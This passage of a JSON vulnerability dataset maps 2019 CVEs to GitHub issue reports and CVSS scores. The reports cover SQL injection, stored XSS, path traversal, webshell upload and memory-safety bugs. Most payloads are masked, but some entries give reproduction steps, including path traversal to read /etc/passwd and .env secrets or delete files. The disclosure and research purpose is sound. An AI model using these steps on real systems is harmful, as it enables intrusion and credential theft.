  39381. "Issue_Url_old": "https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/1",
  39382. "Issue_Url_new": "https://github.com/xiaokuoai/xiaokuoai.github.io/issues/1",
  39383. "Repo_new": "XiaOkuoAi/XiaOkuoAi.github.io",
  39384. "Issue_Created_At": "2019-09-29T13:07:55Z",
  39385. "description": "Metinfocms NUMBERTAG SQL\u6ce8\u5165\uff08\u6700\u65b0\u7248\u672c)\u7b2c\u4e00\u679a. \u4e8c\u3001\u6f0f\u6d1e\u6982\u8ff0 \u5168\u5c40\u641c\u7d22 where PATHTAG ERRORTAG \u53d1\u73b0 APITAG \u76f4\u63a5\u88ab\u62fc\u63a5\u8fdbsql\u8bed\u53e5\uff0c\u4e14 listid \u662f\u51fd\u6570\u76f4\u63a5\u4f20\u8fdb\u6765\u7684\u53c2\u6570\uff0c\u641c\u7d22\u54ea\u4e9b\u51fd\u6570\u8c03\u7528\u4e86\u8fd9\u4e2a\u51fd\u6570 FILETAG \u4e09\u3001\u5229\u7528\u4ee3\u7801 POC: ERRORTAG",
  39386. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39387. "severity": "HIGH",
  39388. "baseScore": 7.2,
  39389. "impactScore": 5.9,
  39390. "exploitabilityScore": 1.2
  39391. },
  39392. {
  39393. "CVE_ID": "CVE-2019-16997",
  39394. "Issue_Url_old": "https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/2",
  39395. "Issue_Url_new": "https://github.com/xiaokuoai/xiaokuoai.github.io/issues/2",
  39396. "Repo_new": "XiaOkuoAi/XiaOkuoAi.github.io",
  39397. "Issue_Created_At": "2019-09-29T13:08:51Z",
  39398. "description": "Metinfocms NUMBERTAG SQL\u6ce8\u5165\uff08\u6700\u65b0\u7248\u672c\uff09\u7b2c\u4e8c\u679a. \u4e8c\u3001\u6f0f\u6d1e\u6982\u8ff0 PATHTAG ERRORTAG APITAG \u76f4\u63a5\u62fc\u63a5 \u5f53 site \u7b49\u4e8eweb\u6216\u8005admin\u65f6\u9020\u6210sql\u6ce8\u5165 \u627e\u4e0b\u6709\u6ca1\u6709\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\u4f20\u53c2\u7684 PATHTAG ERRORTAG \u770b\u4e0b\u4ee3\u7801\uff0c\u9996\u5148\u8981\u4f20\u9012\u53c2\u6570 editor \u8df3\u51fa\u7b2c\u4e00\u4e2aif\u8bed\u53e5\u5757\uff0c\u7136\u540e site \u548c appno \u76f4\u63a5\u4f20\u5165 APITAG \u51fd\u6570\uff0c\u53c2\u6570\u90fd\u53ef\u63a7\uff0c\u59a5\u59a5\u7684\u6ce8\u5165\u3002 payload ERRORTAG APITAG FILETAG \u4e09\u3001\u5229\u7528\u4ee3\u7801 POC: ERRORTAG",
  39399. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39400. "severity": "HIGH",
  39401. "baseScore": 7.2,
  39402. "impactScore": 5.9,
  39403. "exploitabilityScore": 1.2
  39404. },
  39405. {
  39406. "CVE_ID": "CVE-2019-16999",
  39407. "Issue_Url_old": "https://github.com/idcos/Cloudboot/issues/22",
  39408. "Issue_Url_new": "https://github.com/idcos/cloudboot/issues/22",
  39409. "Repo_new": "idcos/cloudboot",
  39410. "Issue_Created_At": "2019-09-05T10:19:46Z",
  39411. "description": "Cloudboot has SQL injection. A sql injection was discovered in cloudboot There is a sql injection vulnerability which allows remote attackers to inject sql command of PATHTAG APITAG POST PATHTAG HTTP NUMBERTAG Host: example.com Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG by NUMBERTAG APITAG APITAG is the injection point Use sqlmap to get the database FILETAG",
  39412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39413. "severity": "CRITICAL",
  39414. "baseScore": 9.8,
  39415. "impactScore": 5.9,
  39416. "exploitabilityScore": 3.9
  39417. },
  39418. {
  39419. "CVE_ID": "CVE-2019-17050",
  39420. "Issue_Url_old": "https://github.com/the-control-group/voyager/issues/4322",
  39421. "Issue_Url_new": "https://github.com/the-control-group/voyager/issues/4322",
  39422. "Repo_new": "the-control-group/voyager",
  39423. "Issue_Created_At": "2019-08-08T02:14:59Z",
  39424. "description": "Security: critical vulnurability in Voyager Compass. Version information Laravel NUMBERTAG oyager NUMBERTAG PHP NUMBERTAG Database: APITAG NUMBERTAG Description During pentesting some projects, i found critical vulnerability in Voyager Compass. This vulnerability can give to anyone, who has permission to use compass, power of download and delete every file in the system if the user has permission for this operation in the system. This means, bad guy can steal .env file of your application and sign his own new session and cookie with secret application key or just drop your database knowing username and password of the database. How can you reproduce it? It's very easy. Voyager Compass has two GET parameters: download and del. They are used for download and deleting error logs in the directory 'logs'. If you want to read or delete file out of this directory you can't just type absolute path to this file, because this feature was fixed. To bypass this, you have to use path traversal trick. Now you make a get request like \" URLTAG {download/del}=path_to_file\", where path to file is base NUMBERTAG encode path in format like PATHTAG e.g. i want to download very sensitive file /etc/passwd, so i construct path to it with path traversal trick PATHTAG in base NUMBERTAG encode APITAG and now i can download passwd from the server: \" URLTAG \". Another example is .env file of your application. You can easily download it with \"../.env\" path to it. Request to it is: \" URLTAG \". Same thing with del parameter to delete this files from server: \" URLTAG \" and \" URLTAG \". You can do this with any file on the server. How to fix it This vulnerability has a high criticality and a CVSS score estimate to NUMBERTAG For fix it, i recommend check is the final directory of the path is directory, that existing in the logs directory.",
  39425. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39426. "severity": "HIGH",
  39427. "baseScore": 7.2,
  39428. "impactScore": 5.9,
  39429. "exploitabilityScore": 1.2
  39430. },
  39431. {
  39432. "CVE_ID": "CVE-2019-17073",
  39433. "Issue_Url_old": "https://github.com/emlog/emlog/issues/49",
  39434. "Issue_Url_new": "https://github.com/emlog/emlog/issues/49",
  39435. "Repo_new": "emlog/emlog",
  39436. "Issue_Created_At": "2019-09-30T01:32:34Z",
  39437. "description": "emlog discover any file deletion vulnerability again!. vulnerability in FILETAG line NUMBERTAG ERRORTAG > if (true === APITAG . APITAG tracking APITAG function: ERRORTAG Unrestricted character \u201c../\u201d Login management background and view APITAG PATHTAG &token=U login token! POC: APITAG",
  39438. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  39439. "severity": "MEDIUM",
  39440. "baseScore": 6.5,
  39441. "impactScore": 3.6,
  39442. "exploitabilityScore": 2.8
  39443. },
  39444. {
  39445. "CVE_ID": "CVE-2019-17074",
  39446. "Issue_Url_old": "https://github.com/dayrui/xunruicms/issues/2",
  39447. "Issue_Url_new": "https://github.com/dayrui/xunruicms/issues/2",
  39448. "Repo_new": "dayrui/xunruicms",
  39449. "Issue_Created_At": "2019-09-30T08:34:15Z",
  39450. "description": "There is a stored xss in module_category\uff08\u680f\u76ee\u7ba1\u7406\uff09. FILETAG FILETAG FILETAG",
  39451. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39452. "severity": "MEDIUM",
  39453. "baseScore": 5.4,
  39454. "impactScore": 2.7,
  39455. "exploitabilityScore": 2.3
  39456. },
  39457. {
  39458. "CVE_ID": "CVE-2019-17091",
  39459. "Issue_Url_old": "https://github.com/eclipse-ee4j/mojarra/issues/4556",
  39460. "Issue_Url_new": "https://github.com/eclipse-ee4j/mojarra/issues/4556",
  39461. "Repo_new": "eclipse-ee4j/mojarra",
  39462. "Issue_Created_At": "2019-04-03T14:29:47Z",
  39463. "description": "HIGH LEVEL VULNERABILITY WITHIN ORACLE MOJARRA JSF NUMBERTAG This is a security bug. Please fix it in accordance with: PATHTAG Dear Oracle team, SEC Consult is a leading consulting company for information security. During a short security crash test we have found a high level security vulnerability within Oracle Mojarra JSF NUMBERTAG The encrypted security advisory with proof of concept information is attached. I have also attached my public PGP and S/MIME keys for further encrypted communication. Please provide us with an estimate on when the vulnerability will be fixed in order to set the actual release date. Please keep us informed if there are any changes. Please also see our attached responsible disclosure policy (PDF) which defines the process of publication of the security advisory. The security advisory will be released according to the chapter NUMBERTAG phase NUMBERTAG APITAG disclosure\", the latest possible release date is NUMBERTAG days from now NUMBERTAG Keep in mind that we can't give any other free support besides providing the security advisory information. Best regards, Jean Benjamin Rousseau Security Consultant",
  39464. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39465. "severity": "MEDIUM",
  39466. "baseScore": 6.1,
  39467. "impactScore": 2.7,
  39468. "exploitabilityScore": 2.8
  39469. },
  39470. {
  39471. "CVE_ID": "CVE-2019-17104",
  39472. "Issue_Url_old": "https://github.com/centreon/centreon/issues/7097",
  39473. "Issue_Url_new": "https://github.com/centreon/centreon/issues/7097",
  39474. "Repo_new": "centreon/centreon",
  39475. "Issue_Created_At": "2019-01-02T18:12:45Z",
  39476. "description": "[security] Unsecured Cookies. APITAG BUG REPORT INFORMATION OS: Centreon Central NUMBERTAG el7 Vulnerability The Apache configuration deployed in the Centreon virtual machine does not protect cookies against eavesdropping nor XSS exfiltrations. The flag APITAG would prevent an attacker from stealing eavesdropping on the network, although it would only work if HTTPS was globally enabled which isn't the case right now. The flag APITAG would prevent an attacker from stealing the cookie via a XSS by forbidding APITAG to read cookies.",
  39477. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  39478. "severity": "HIGH",
  39479. "baseScore": 7.5,
  39480. "impactScore": 3.6,
  39481. "exploitabilityScore": 3.9
  39482. },
  39483. {
  39484. "CVE_ID": "CVE-2019-17106",
  39485. "Issue_Url_old": "https://github.com/centreon/centreon/issues/7098",
  39486. "Issue_Url_new": "https://github.com/centreon/centreon/issues/7098",
  39487. "Repo_new": "centreon/centreon",
  39488. "Issue_Created_At": "2019-01-02T18:44:09Z",
  39489. "description": "FILETAG",
  39490. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  39491. "severity": "MEDIUM",
  39492. "baseScore": 6.5,
  39493. "impactScore": 3.6,
  39494. "exploitabilityScore": 2.8
  39495. },
  39496. {
  39497. "CVE_ID": "CVE-2019-17175",
  39498. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/443",
  39499. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/443",
  39500. "Repo_new": "joyplus/joyplus-cms",
  39501. "Issue_Created_At": "2019-09-03T07:20:02Z",
  39502. "description": "joyplus cms Cross directory access FILETAG . describe You can view files in other directories across directories url: URLTAG FILETAG Code audit FILETAG",
  39503. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  39504. "severity": "HIGH",
  39505. "baseScore": 7.5,
  39506. "impactScore": 3.6,
  39507. "exploitabilityScore": 3.9
  39508. },
  39509. {
  39510. "CVE_ID": "CVE-2019-17177",
  39511. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/5645",
  39512. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/5645",
  39513. "Repo_new": "freerdp/freerdp",
  39514. "Issue_Created_At": "2019-10-04T11:51:58Z",
  39515. "description": "Potential Memory Leaks on APITAG Dear APITAG I would like to report a potential memory leak on APITAG The problem occurs on the way realloc is being used. When a size bigger than the chunk that wants to be reallocated is passed, realloc try to malloc a bigger size, however in the case that malloc fails (for example, by forcing a big allocation) realloc will return NULL. According to the man page: APITAG APITAG function returns a pointer to the newly allocated memory, which is suitably aligned for any built in type and may be different from ptr, or NULL if the request fails. If size was equal to NUMBERTAG either NULL or a pointer suitable to be passed to APITAG is returned. If APITAG fails, the original block is left untouched; it is not freed or moved.\" The problem occurs when the memory ptr passed to the first argument of realloc is the same as the one used for the result, for example in this case: PATHTAG NUMBERTAG int APITAG = sizeof(REGION NUMBERTAG DATA) + APITAG sizeof(RECTANGLE NUMBERTAG region >data = realloc(region >data, APITAG If the malloc inside that realloc fails, then the original memory chunk will never be free but since realloc will return NULL, the pointer to that memory chunk will be lost and a memory leak will occur. We found other NUMBERTAG cases, all could be found here: URLTAG APITAG case where xrealloc should be disregarded since abort is being called on fail) Best Regards, Nico Waisman Semmle Security Team",
  39516. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  39517. "severity": "HIGH",
  39518. "baseScore": 7.5,
  39519. "impactScore": 3.6,
  39520. "exploitabilityScore": 3.9
  39521. },
  39522. {
  39523. "CVE_ID": "CVE-2019-17188",
  39524. "Issue_Url_old": "https://github.com/fecshop/yii2_fecshop/issues/77",
  39525. "Issue_Url_new": "https://github.com/fecshop/yii2_fecshop/issues/77",
  39526. "Repo_new": "fecshop/yii2_fecshop",
  39527. "Issue_Created_At": "2019-08-28T16:33:19Z",
  39528. "description": "Found unrestricted file upload vulnerability. What steps will reproduce the problem? Login the admin page and find a place to upload APITAG image. Intercept the request, change the file extension to APITAG and insert the content of webshell: FILETAG APITAG FILETAG Additional info | Q | A | | | Fecshop version NUMBERTAG PHP version NUMBERTAG Operating system APITAG NUMBERTAG",
  39529. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  39530. "severity": "HIGH",
  39531. "baseScore": 7.2,
  39532. "impactScore": 5.9,
  39533. "exploitabilityScore": 1.2
  39534. },
  39535. {
  39536. "CVE_ID": "CVE-2019-17203",
  39537. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2690",
  39538. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2690",
  39539. "Repo_new": "nilsteampassnet/teampass",
  39540. "Issue_Created_At": "2019-09-30T11:50:49Z",
  39541. "description": "Stored XSS at Search page. Steps to reproduce NUMBERTAG Add a new item to any folder, set a password with XSS payload: ERRORTAG NUMBERTAG Open Search Page, find and click at the item NUMBERTAG That's all. The XSS payload will be triggered. In fact, it will be triggered an infinite number of times if you click on the show password icon. FILETAG",
  39542. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39543. "severity": "MEDIUM",
  39544. "baseScore": 5.4,
  39545. "impactScore": 2.7,
  39546. "exploitabilityScore": 2.3
  39547. },
  39548. {
  39549. "CVE_ID": "CVE-2019-17204",
  39550. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2689",
  39551. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2689",
  39552. "Repo_new": "nilsteampassnet/teampass",
  39553. "Issue_Created_At": "2019-09-30T11:38:35Z",
  39554. "description": "Stored XSS in KBs field. Steps to reproduce NUMBERTAG Open Knowledge Base, tap on Add a new KB NUMBERTAG Set XSS payload as label name: ERRORTAG NUMBERTAG Add any available item which you want to \"infect NUMBERTAG That's all. Anyone who click at the item will trigger XSS payload FILETAG",
  39555. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39556. "severity": "MEDIUM",
  39557. "baseScore": 5.4,
  39558. "impactScore": 2.7,
  39559. "exploitabilityScore": 2.3
  39560. },
  39561. {
  39562. "CVE_ID": "CVE-2019-17205",
  39563. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2688",
  39564. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2688",
  39565. "Repo_new": "nilsteampassnet/teampass",
  39566. "Issue_Created_At": "2019-09-30T11:18:56Z",
  39567. "description": "Stored XSS in log of Failed Logins. Steps to reproduce NUMBERTAG Try to login with any password and username like: ERRORTAG NUMBERTAG When an Administrator will see a log of Failed Logins, XSS payload will be executed APITAG version NUMBERTAG FILETAG",
  39568. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  39569. "severity": "MEDIUM",
  39570. "baseScore": 6.1,
  39571. "impactScore": 2.7,
  39572. "exploitabilityScore": 2.8
  39573. },
  39574. {
  39575. "CVE_ID": "CVE-2019-17210",
  39576. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/11802",
  39577. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/11802",
  39578. "Repo_new": "armmbed/mbed-os",
  39579. "Issue_Created_At": "2019-11-04T02:48:00Z",
  39580. "description": "The bug of APITAG MQTT. Description of defect URL: URLTAG URLTAG Upstream URL: URLTAG URLTAG The MQTT library is used to receive, parse and send mqtt packet between a broker and a client. The function APITAG is called by the function APITAG to get the length and content of the MQTT topic name. It parses the MQTT input linearly. Once a type length value tuple is parsed, the index is increased correspondingly. The maximum index is restricted by the length of the received packet size, as shown in line NUMBERTAG of the code snippet below. ERRORTAG Note that mqttstring >lenstring.len is a part of user input, which can be manipulated. An attacker can simply change it to a larger value to invalidate the if statement so that the statements from line NUMBERTAG to NUMBERTAG are skipped, leaving the value of mqttstring APITAG default to zero. Later, the value of mqttstring APITAG is assigned to curn (line NUMBERTAG of the code snippet below), which is zero under the attack. In line NUMBERTAG curn is accessed. In an ARM cortex M chip, the value at address NUMBERTAG is actually the initialization value for the MSP register. It is highly dependent on the actual firmware. Therefore, the behavior of the program is unpredictable from this time on. ERRORTAG A malformed MQTT packet may cause unexpected behaviors depending on the value stored at the address zero on the board. Target(s) affected by this defect ? MQTT library of APITAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? Mbed OS MQTT library NUMBERTAG No NUMBERTAG Mbed OS latest release What version(s) of tools are you using. List all that apply (E.g. mbed cli) mbed cli latest version How is this defect reproduced ? Use bug_mqtt NUMBERTAG and bug_mqtt NUMBERTAG as received mqtt packet after mqtt connect and subscribe FILETAG FILETAG",
  39581. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  39582. "severity": "HIGH",
  39583. "baseScore": 7.5,
  39584. "impactScore": 3.6,
  39585. "exploitabilityScore": 3.9
  39586. },
  39587. {
  39588. "CVE_ID": "CVE-2019-17211",
  39589. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/11804",
  39590. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/11804",
  39591. "Repo_new": "armmbed/mbed-os",
  39592. "Issue_Created_At": "2019-11-04T03:10:22Z",
  39593. "description": "The bug2 of APITAG APITAG library. Description of defect Reference: URLTAG URLTAG Function: APITAG URLTAG The APITAG builder is responsible for crafting outgoing APITAG messages. The function APITAG is used to calculate the needed memory for the APITAG message from the sn_coap_hdr_s data structure. Both returned_byte_count and src_coap_msg_ptr >payload_len are of type uint NUMBERTAG t. When added together, the result returned_byte_count will wrap around the maximum as shown in line NUMBERTAG As a result, insufficient buffer is allocated for the corresponding APITAG message. CODETAG c static int NUMBERTAG t APITAG uint NUMBERTAG t option_len, const uint8_t option_ptr, ...) { ... memcpy(dest_packet, option_ptr, option_len); ... } ` In the following, we list other locations which will cause out of bound memory accesses rooted in this vulnerability. URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG Target(s) affected by this defect ? APITAG APITAG library Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) mbed cli latest version How is this defect reproduced ? Use bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG and bug_coap NUMBERTAG as input of demo code in Bug NUMBERTAG URLTAG will trigger bugs. FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
  39594. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39595. "severity": "CRITICAL",
  39596. "baseScore": 9.8,
  39597. "impactScore": 5.9,
  39598. "exploitabilityScore": 3.9
  39599. },
  39600. {
  39601. "CVE_ID": "CVE-2019-17212",
  39602. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/11803",
  39603. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/11803",
  39604. "Repo_new": "armmbed/mbed-os",
  39605. "Issue_Created_At": "2019-11-04T03:01:01Z",
  39606. "description": "The bug of APITAG APITAG library. Description of defect Reference: URLTAG URLTAG Function: sn_coap_parser_options_parse URLTAG URLTAG The APITAG parser is responsible for parsing received APITAG packets. The function APITAG parses APITAG input linearly using a while loop. Once an option is parsed in a loop, the current point ( packet_data_pptr) is increased correspondingly. The pointer is restricted by the size of the received buffer, as well as a delimiter byte APITAG as shown in line NUMBERTAG of the code snippet below. CODETAG Unfortunately, inside each while loop, the check of the value of packet_data_pptr is not strictly enforced. More specifically, inside a loop, packet_data_pptr could be increased and then dereferenced without checking. Moreover, there are many other functions in the format of sn_coap_parser_ () that do not check whether the pointer is within the bound of the allocated buffer. All of these lead to heap or stack buffer overflow, depending on how the APITAG packet buffer is allocated. In the following, we list other locations which cause out of bound memory accesses rooted in this vulnerability. URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG Target(s) affected by this defect ? APITAG APITAG library Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) mbed cli latest version How is this defect reproduced ? Using bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG and bug_coap NUMBERTAG as input of demo codes below, previous crash examples in sn_coap_parser.c will be triggered. ERRORTAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
  39607. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39608. "severity": "CRITICAL",
  39609. "baseScore": 9.8,
  39610. "impactScore": 5.9,
  39611. "exploitabilityScore": 3.9
  39612. },
  39613. {
  39614. "CVE_ID": "CVE-2019-17225",
  39615. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/845",
  39616. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/845",
  39617. "Repo_new": "intelliants/subrion",
  39618. "Issue_Created_At": "2019-09-20T07:36:13Z",
  39619. "description": "Admin Member JSON Update Store XSS vulnerable. Test it on version NUMBERTAG First login the panel with user credential, Go to member tag from left menu. APITAG Username, Full Name, Email are editable with double click on it. Insert the following payload ERRORTAG Xss alert are trigger. Poc FILETAG Note. Script tag are filter in the input field. it is work at username APITAG Poc NUMBERTAG FILETAG Please fix and filter all input tag. Thank you.",
  39620. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  39621. "severity": "MEDIUM",
  39622. "baseScore": 5.4,
  39623. "impactScore": 2.7,
  39624. "exploitabilityScore": 2.3
  39625. },
  39626. {
  39627. "CVE_ID": "CVE-2019-17263",
  39628. "Issue_Url_old": "https://github.com/libyal/libfwsi/issues/13",
  39629. "Issue_Url_new": "https://github.com/libyal/libfwsi/issues/13",
  39630. "Repo_new": "libyal/libfwsi",
  39631. "Issue_Created_At": "2019-10-01T14:11:34Z",
  39632. "description": "OOB read of NUMBERTAG in libfwsi_extension_block NUMBERTAG ersion: lnkinfo NUMBERTAG ERRORTAG To reproduce: ./lnkinfo FILETAG",
  39633. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
  39634. "severity": "LOW",
  39635. "baseScore": 3.3,
  39636. "impactScore": 1.4,
  39637. "exploitabilityScore": 1.8
  39638. },
  39639. {
  39640. "CVE_ID": "CVE-2019-17264",
  39641. "Issue_Url_old": "https://github.com/libyal/liblnk/issues/38",
  39642. "Issue_Url_new": "https://github.com/libyal/liblnk/issues/38",
  39643. "Repo_new": "libyal/liblnk",
  39644. "Issue_Created_At": "2019-09-13T07:58:33Z",
  39645. "description": "heap buffer overflow in APITAG As i understand from issue NUMBERTAG the bug was patched in commit NUMBERTAG b NUMBERTAG a3 but while fuzzing lnkinfo from the master branch, I still encounter this issue. I complied liblnk with gcc and g++ enabling ASAN the fuzzing results showed me a heap buffer overflow in APITAG ASAN ERRORTAG I've attached FILETAG for reference, I also observed the program don't return me any SEGFAULT when I passed the above corpus APITAG ASAN). Request maintainer to please have a look or suggest if I am missing something here.",
  39646. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
  39647. "severity": "LOW",
  39648. "baseScore": 3.3,
  39649. "impactScore": 1.4,
  39650. "exploitabilityScore": 1.8
  39651. },
  39652. {
  39653. "CVE_ID": "CVE-2019-17267",
  39654. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2460",
  39655. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2460",
  39656. "Repo_new": "fasterxml/jackson-databind",
  39657. "Issue_Created_At": "2019-09-17T06:34:14Z",
  39658. "description": "May be a new default typing gadget. Hey, buddy. I may have found a new gadget can be used to exploit jackson which can cause RCE. I have sent the report to EMAILTAG",
  39659. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39660. "severity": "CRITICAL",
  39661. "baseScore": 9.8,
  39662. "impactScore": 5.9,
  39663. "exploitabilityScore": 3.9
  39664. },
  39665. {
  39666. "CVE_ID": "CVE-2019-17268",
  39667. "Issue_Url_old": "https://github.com/beenhero/omniauth-weibo-oauth2/issues/36",
  39668. "Issue_Url_new": "https://github.com/beenhero/omniauth-weibo-oauth2/issues/36",
  39669. "Repo_new": "beenhero/omniauth-weibo-oauth2",
  39670. "Issue_Created_At": "2019-10-09T12:17:49Z",
  39671. "description": "CVETAG report for omniauth weibo oauth2. Hey, I took courtesy of reporting the malicious code injection in APITAG into the CVE database. FILETAG Just wanted to let you know. They initially assigned the APITAG .",
  39672. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  39673. "severity": "CRITICAL",
  39674. "baseScore": 9.8,
  39675. "impactScore": 5.9,
  39676. "exploitabilityScore": 3.9
  39677. },
  39678. {
  39679. "CVE_ID": "CVE-2019-17352",
  39680. "Issue_Url_old": "https://github.com/jfinal/jfinal/issues/171",
  39681. "Issue_Url_new": "https://github.com/jfinal/jfinal/issues/171",
  39682. "Repo_new": "jfinal/jfinal",
  39683. "Issue_Created_At": "2019-08-13T06:36:58Z",
  39684. "description": "There is a vulnerability which can bypass the APITAG function in APITAG ,so that I can upload any kind of files effectively. In APITAG , the upload function APITAG handle uploading files in this way NUMBERTAG handle upload request and upload all of the files in request without any safety precautions NUMBERTAG then judge the upload files and delete the dangerous files by APITAG function. However, if I can try to create a exception which happened after upload and before APITAG function , the dangerous files will upload to the server successfully. So, I make a request like this FILETAG In my code , I just accept file param like APITAG APITAG I send a request which have two params(\"file\" and APITAG , the code will upload jsp file to the server and stop running before APITAG function, since the code will catch an exception ERRORTAG Content disposition corrupt: Content Disposition: form data: APITAG . FILETAG",
  39685. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  39686. "severity": "HIGH",
  39687. "baseScore": 7.5,
  39688. "impactScore": 3.6,
  39689. "exploitabilityScore": 3.9
  39690. },
  39691. {
  39692. "CVE_ID": "CVE-2019-17357",
  39693. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3025",
  39694. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3025",
  39695. "Repo_new": "cacti/cacti",
  39696. "Issue_Created_At": "2019-10-12T19:46:24Z",
  39697. "description": "SQL Injection in FILETAG . Describe the bug As reported by Eldar Marcussen of APITAG there is a SQL injection vulnerability in Cacti's FILETAG . Expected behavior Cacti should be not contain SQL vunderabilities",
  39698. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  39699. "severity": "MEDIUM",
  39700. "baseScore": 6.5,
  39701. "impactScore": 3.6,
  39702. "exploitabilityScore": 2.8
  39703. },
  39704. {
  39705. "CVE_ID": "CVE-2019-17358",
  39706. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3026",
  39707. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3026",
  39708. "Repo_new": "cacti/cacti",
  39709. "Issue_Created_At": "2019-10-12T19:52:09Z",
  39710. "description": "Unsafe deserialization in Cacti. Describe the bug As reported by Eldar Marcussen of APITAG Cacti's unserialization of form data does not properly validate the form input which can result in unsafe unserialization operations. Expected behavior Cacti should always check serialized data for expected formatting, or utilize JSON data within the form post to avoid the use of the APITAG function when dealing with untrusted data.",
  39711. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  39712. "severity": "HIGH",
  39713. "baseScore": 8.1,
  39714. "impactScore": 5.2,
  39715. "exploitabilityScore": 2.8
  39716. },
  39717. {
  39718. "CVE_ID": "CVE-2019-17362",
  39719. "Issue_Url_old": "https://github.com/libtom/libtomcrypt/issues/507",
  39720. "Issue_Url_new": "https://github.com/libtom/libtomcrypt/issues/507",
  39721. "Repo_new": "libtom/libtomcrypt",
  39722. "Issue_Created_At": "2019-10-03T17:45:17Z",
